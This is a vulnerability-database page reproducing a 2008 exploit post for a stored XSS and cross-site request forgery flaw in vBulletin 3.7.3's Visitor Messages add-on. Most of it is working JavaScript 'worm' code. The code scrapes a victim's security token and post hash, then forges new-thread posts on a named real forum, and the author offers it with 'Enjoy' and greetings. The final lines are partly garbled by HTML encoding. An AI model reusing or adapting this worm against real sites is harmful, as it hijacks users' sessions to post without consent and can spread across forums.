Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20893
HistoryNov 21, 2008 - 12:00 a.m.

vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm

2008-11-2100:00:00
vulners.com
56
JSON

/* -----------------------------

  • Author = Mx
  • Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
  • Software = vBulletin
  • Addon = Visitor Messages
  • Version = 3.7.3
  • Attack = XSS/XSRF
  • Description = A critical vulnerability exists in the new vBulletin 3.7.3
    software which comes included
  • with the visitor messages addon (a clone of a social network
    wall/comment
    area).
  • When posting XSS, the data is run through htmlentities(); before being
    displayed
  • to the general public/forum members. However, when posting a new
    message,
  • a new notification is sent to the commentee. The commenter posts a XSS
    vector such as
  • under the domain, they are hit with an unfiltered xss attach. XSRF is
    also readily available
  • and I have included an example worm that makes the user post a new
    thread
    with your own
  • specified subject and message.
  • Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which
    was the first subject
  • of the attack method.
  • ----------------------------- */

function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}

function getAXAH(url){

var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);

function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);

var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);

var subject = 'subject text';
var message = 'message text';

postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5',
'subject=' + subject + '&message=' + message +
'&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok +
'&f=5&do=postthread&posthash=' + postok +
'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');

}
}
}
}

function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();

theHttpRequest.onreadystatechange = function()
{processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);

function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

}
}
}
}

getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5'<http://digitalgangster.com/4um/newthread.php?do=newthread&f=5%27>
);
document.write('<iframe src="
http://digitalgangster.com/4um/newthread.php?do=newthread&amp;f=5&quot;&gt;&#39;&#41;;

JSON